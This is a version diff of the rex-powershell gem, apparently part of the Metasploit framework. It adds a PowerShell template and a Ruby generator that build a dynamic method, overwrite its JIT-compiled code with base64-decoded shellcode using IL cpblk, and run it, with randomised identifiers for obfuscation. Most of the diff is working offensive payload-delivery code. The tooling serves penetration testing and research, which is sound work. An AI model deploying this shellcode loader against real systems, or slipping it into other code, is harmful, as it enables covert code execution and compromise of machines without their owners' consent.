rex-powershell 0.1.74 → 0.1.75

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA1:
-  metadata.gz: b88e31ce42aa0f6b8b9849c916f24680f156fb59
-  data.tar.gz: '0395b6d9bf3e79c7edfaff20e36b049c5df254c7'
+  metadata.gz: 8df50450c5b08d320bbe1e4c5c8bf588ec79c379
+  data.tar.gz: ac24dc2a5d73c0fa27c8824b154b6988078fbbcf
 SHA512:
-  metadata.gz: 5b295b9d04daf9e4b7d39b80ed60ecfd70392c0b45c3337ad39848482f53e5499d30a08f33e9cb72e2a2a6026ca01ce05a1046baa81e0f449e36c9fee0aedec4
-  data.tar.gz: ae1d2be6edc876b9ec72a408ac466b2e5d73823a34f46c7f46e4033296d4b55730492f315706234d75723cd72107820eaa2b60aa3670825b26d0f41c95f29ded
+  metadata.gz: e881e86dc2e6766940499e636bd0465f2b592b4ef3059f005306163c60c553e5a26631775d9263284002f7f35fe6373eb2c3f4a5e3364e019536101af389ced1
+  data.tar.gz: 942aa831e1517f61b14928e3c609d9611dc453fee274336a31c8cc65fcba4f0dcb74a56637982e1376152dbad305cc30bd120b1d7df4c4e1952c95141ceb3475

data/data/templates/to_mem_msil.ps1.template

@@ -0,0 +1,67 @@
+function %{func_build_dyn_type}($%{var_type_name}){
+  $%{var_dyn_asm} = ([AppDomain]::CurrentDomain).DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($%{var_type_name})), [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
+  $%{var_dyn_asm}.SetCustomAttribute((New-Object System.Reflection.Emit.CustomAttributeBuilder((New-Object System.Security.AllowPartiallyTrustedCallersAttribute).GetType().GetConstructors()[0], (New-Object System.Object[](0)))))
+  $%{var_dyn_mod} = $%{var_dyn_asm}.DefineDynamicModule($%{var_type_name})
+  $%{var_dyn_mod}.SetCustomAttribute((New-Object System.Reflection.Emit.CustomAttributeBuilder((New-Object System.Security.UnverifiableCodeAttribute).GetType().GetConstructors()[0], (New-Object System.Object[](0)))))
+  return $%{var_dyn_mod}.DefineType($%{var_type_name}, [System.Reflection.TypeAttributes]::Public)
+}
+function %{func_get_meth_addr}($%{var_tgt_meth}){
+  $%{var_dyn_type} = %{func_build_dyn_type}('%{str_addr_loc}')
+  $%{var_dyn_meth} = ($%{var_dyn_type}.DefineMethod('%{str_tgt_meth}', [System.Reflection.MethodAttributes]::Public -bOr [System.Reflection.MethodAttributes]::Static, $(if ([IntPtr]::Size -eq 4) { [UInt32] } else { [Int64] }), $null)).GetILGenerator()
+  $%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Ldftn, [System.Reflection.MethodInfo]$%{var_tgt_meth})
+  $%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Ret)
+  return (($%{var_dyn_type}.CreateType()).GetMethod('%{str_tgt_meth}')).Invoke($null, @())
+}
+
+$%{var_dyn_type} = %{func_build_dyn_type}('%{var_src_meth}')
+$%{var_args} = New-Object System.Type[](3)
+$%{var_args}[0] = [IntPtr]
+$%{var_args}[1] = [IntPtr]
+$%{var_args}[2] = [Int32]
+$%{var_dyn_meth} = ($%{var_dyn_type}.DefineMethod('%{str_src_type}', [System.Reflection.MethodAttributes]::Public -bOr [System.Reflection.MethodAttributes]::Static, $null, $%{var_args})).GetILGenerator()
+$%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Ldarg_0)
+$%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Ldarg_1)
+$%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Ldarg_2)
+$%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Volatile)
+$%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Cpblk)
+$%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Ret)
+$%{var_src_meth} = ($%{var_dyn_type}.CreateType()).GetMethod('%{str_src_type}')
+
+$%{var_dyn_type} = %{func_build_dyn_type}('%{str_tgt_type}')
+$%{var_args} = New-Object System.Type[](1)
+$%{var_args}[0] = [Int]
+$%{var_dyn_meth} = ($%{var_dyn_type}.DefineMethod('%{str_tgt_meth}', [System.Reflection.MethodAttributes]::Public -bOr [System.Reflection.MethodAttributes]::Static, [Int], $%{var_args})).GetILGenerator()
+$%{var_xor} = 0x41424344
+$%{var_dyn_meth}.DeclareLocal([Int]) | Out-Null
+$%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Ldarg_0)
+foreach ($CodeBlock in 1..100) {
+  $%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Ldc_I4, $%{var_xor})
+  $%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Xor)
+  $%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Stloc_0)
+  $%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Ldloc_0)
+  $%{var_xor}++
+}
+$%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Ldc_I4, $%{var_xor})
+$%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Xor)
+$%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Ret)
+$%{var_tgt_meth} = ($%{var_dyn_type}.CreateType()).GetMethod('%{str_tgt_meth}')
+
+foreach ($Exec in 1..20) { $%{var_tgt_meth}.Invoke($null, @(0x11112222)) | Out-Null }
+
+if ( [IntPtr]::Size -eq 4 ) {
+  $%{var_sc} = [Byte[]] @(0x60,0xE8,0x04,0,0,0,0x61,0x31,0xC0,0xC3)
+} else {
+  $%{var_sc} = [Byte[]] @(0x41,0x54,0x41,0x55,0x41,0x56,0x41,0x57,0x55,0xE8,0x0D,0x00,0x00,0x00,0x5D,0x41,0x5F,0x41,0x5E,0x41,0x5D,0x41,0x5C,0x48,0x31,0xC0,0xC3)
+}
+$%{var_sc} += [System.Convert]::FromBase64String("%{b64shellcode}")
+$%{var_sc_addr} = [Runtime.InteropServices.Marshal]::AllocHGlobal($%{var_sc}.Length)
+[Runtime.InteropServices.Marshal]::Copy($%{var_sc}, 0, $%{var_sc_addr}, $%{var_sc}.Length)
+
+$%{var_args} = New-Object Object[](3)
+$%{var_args}[0] = [IntPtr]$(%{func_get_meth_addr} $%{var_tgt_meth})
+$%{var_args}[1] = $%{var_sc_addr}
+$%{var_args}[2] = $%{var_sc}.Length
+
+$%{var_src_meth}.Invoke($null, $%{var_args})
+
+$%{var_tgt_meth}.Invoke($null, @(0x11112222))

data/lib/rex/powershell.rb

@@ -1,13 +1,13 @@
 # -*- coding: binary -*-
 require 'rex/powershell/version'
-require 'rex/powershell/templates'
-require 'rex/powershell/payload'
 require 'rex/powershell/output'
 require 'rex/powershell/parser'
 require 'rex/powershell/obfu'
-require 'rex/powershell/param'
 require 'rex/powershell/function'
+require 'rex/powershell/param'
 require 'rex/powershell/script'
+require 'rex/powershell/templates'
+require 'rex/powershell/payload'
 require 'rex/powershell/psh_methods'
 require 'rex/powershell/command'
 

data/lib/rex/powershell/command.rb

@@ -297,7 +297,7 @@ EOS
       when 'old'
         Rex::Powershell::Payload.to_win32pe_psh(template_path, pay)
       when 'msil'
-        fail RuntimeError, 'MSIL Powershell method no longer exists'
+        Rex::Powershell::Payload.to_win32pe_psh_msil(template_path, pay)
       else
         fail RuntimeError, 'No Powershell method specified'
     end

data/lib/rex/powershell/payload.rb

@@ -5,15 +5,17 @@ module Rex
 module Powershell
 module Payload
 
+  include Rex::Powershell::Templates
+ 
   def self.read_replace_script_template(template_path, filename, hash_sub)
-    template_pathname = File.join(template_path, filename)
     template = ''
+    template_pathname = File.join(template_path, filename)
     File.open(template_pathname, "rb") {|f| template = f.read}
     template % hash_sub
   end
 
-  def self.to_win32pe_psh_net(template_path, code)
-    rig = Rex::RandomIdentifier::Generator.new()
+  def self.to_win32pe_psh_net(template_path = TEMPLATE_DIR, code)
+    rig = Rex::RandomIdentifier::Generator.new(DEFAULT_RIG_OPTS)
     rig.init_var(:var_code)
     rig.init_var(:var_kernel32)
     rig.init_var(:var_baseaddr)
@@ -23,6 +25,7 @@ module Payload
     rig.init_var(:var_compileParams)
     rig.init_var(:var_syscode)
     rig.init_var(:var_temp)
+    rig.init_var(:var_opf)
 
     hash_sub = rig.to_h
     hash_sub[:b64shellcode] = Rex::Text.encode_base64(code)
@@ -30,7 +33,7 @@ module Payload
     read_replace_script_template(template_path, "to_mem_dotnet.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
   end
 
-  def self.to_win32pe_psh(template_path, code)
+  def self.to_win32pe_psh(template_path = TEMPLATE_DIR, code)
     hash_sub = {}
     hash_sub[:var_code] 		= Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_win32_func]	= Rex::Text.rand_text_alpha(rand(8)+8)
@@ -50,9 +53,9 @@ module Payload
   # Tweaked by shellster
   # Originally from PowerSploit
   #
-  def self.to_win32pe_psh_reflection(template_path, code)
+  def self.to_win32pe_psh_reflection(template_path = TEMPLATE_DIR, code)
     # Intialize rig and value names
-    rig = Rex::RandomIdentifier::Generator.new()
+    rig = Rex::RandomIdentifier::Generator.new(DEFAULT_RIG_OPTS)
     rig.init_var(:func_get_proc_address)
     rig.init_var(:func_get_delegate_type)
     rig.init_var(:var_code)
@@ -64,13 +67,43 @@ module Payload
     rig.init_var(:var_type_builder)
     rig.init_var(:var_buffer)
     rig.init_var(:var_hthread)
+    rig.init_var(:var_opf)
+
+    hash_sub = rig.to_h
+    hash_sub[:b64shellcode] = Rex::Text.encode_base64(code)
+
+    read_replace_script_template(template_path, "to_mem_pshreflection.ps1.template",hash_sub).gsub(/(?<!\r)\n/, "\r\n")
+  end
+
+  #
+  # MSIL JIT approach as demonstrated by Matt Graeber
+  # http://www.exploit-monday.com/2013/04/MSILbasedShellcodeExec.html
+  # Referencing PowerShell Empire data/module_source/code_execution/Invoke-ShellcodeMSIL.ps1
+  #
+  def self.to_win32pe_psh_msil(template_path = TEMPLATE_DIR, code)
+    rig = Rex::RandomIdentifier::Generator.new(DEFAULT_RIG_OPTS)
+    rig.init_var(:func_build_dyn_type)
+    rig.init_var(:func_get_meth_addr)
+    rig.init_var(:var_type_name)
+    rig.init_var(:var_dyn_asm)
+    rig.init_var(:var_dyn_mod)
+    rig.init_var(:var_tgt_meth)
+    rig.init_var(:var_dyn_type)
+    rig.init_var(:var_dyn_meth)
+    rig.init_var(:var_args)
+    rig.init_var(:var_xor)
+    rig.init_var(:var_sc_addr)
+    rig.init_var(:var_sc)
+    rig.init_var(:var_src_meth)
+    rig.init_var(:str_addr_loc)
+    rig.init_var(:str_tgt_meth)
+    rig.init_var(:str_src_type)
+    rig.init_var(:str_tgt_type)
 
     hash_sub = rig.to_h
     hash_sub[:b64shellcode] = Rex::Text.encode_base64(code)
 
-    read_replace_script_template(template_path,
-                                 "to_mem_pshreflection.ps1.template",
-                                 hash_sub).gsub(/(?<!\r)\n/, "\r\n")
+    read_replace_script_template(template_path, "to_mem_msil.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
   end
 
 end

data/lib/rex/powershell/script.rb

@@ -1,6 +1,5 @@
 # -*- coding: binary -*-
 
-
 require 'forwardable'
 
 module Rex
@@ -12,6 +11,11 @@ module Powershell
     include Output
     include Parser
     include Obfu
+    DEFAULT_RIG_OPTS = {
+      max_length: 5,
+      min_length: 2,
+      forbidden: Parser::RESERVED_VARIABLE_NAMES.map {|e| e[1..-1]}
+    }
     # Pretend we are actually a string
     extend ::Forwardable
     # In case someone messes with String we delegate based on its instance methods
@@ -31,9 +35,9 @@ module Powershell
                    :[]=, :encode, :*, :hex, :to_f, :strip!, :rpartition, :ord, :capitalize, :upto, :force_encoding,
                    :end_with?
 
-    def initialize(code)
+    def initialize(code, rig = nil)
       @code = ''
-      @rig = Rex::RandomIdentifier::Generator.new
+      @rig = rig || Rex::RandomIdentifier::Generator.new(DEFAULT_RIG_OPTS)
 
       begin
         # Open code file for reading

data/lib/rex/powershell/templates.rb

@@ -2,6 +2,9 @@ module Rex
   module Powershell
     module Templates
 
+      # RandomIdentifier::Generator options
+      DEFAULT_RIG_OPTS = Rex::Powershell::Script::DEFAULT_RIG_OPTS
+
       # The base directory that all Powershell script templates live in
       TEMPLATE_DIR = File.expand_path( File.join( __FILE__ , '..', '..', '..', '..', 'data', 'templates') )
 
@@ -14,6 +17,9 @@ module Rex
       # The powershell script template for memory injection using the old method
       TO_MEM_OLD = File.join(TEMPLATE_DIR, 'to_mem_old.ps1.template')
 
+      # The powershell script template for memory injection using the old method
+      TO_MEM_MSIL = File.join(TEMPLATE_DIR, 'to_mem_msil.ps1.template')
+
     end
   end
 end

data/lib/rex/powershell/version.rb

@@ -1,5 +1,5 @@
 module Rex
   module Powershell
-    VERSION = "0.1.74"
+    VERSION = "0.1.75"
   end
 end

metadata

@@ -1,7 +1,7 @@
 --- !ruby/object:Gem::Specification
 name: rex-powershell
 version: !ruby/object:Gem::Version
-  version: 0.1.74
+  version: 0.1.75
 platform: ruby
 authors:
 - David 'thelightcosine' Maloney
@@ -177,6 +177,7 @@ files:
 - README.md
 - Rakefile
 - data/templates/to_mem_dotnet.ps1.template
+- data/templates/to_mem_msil.ps1.template
 - data/templates/to_mem_old.ps1.template
 - data/templates/to_mem_pshreflection.ps1.template
 - lib/rex/powershell.rb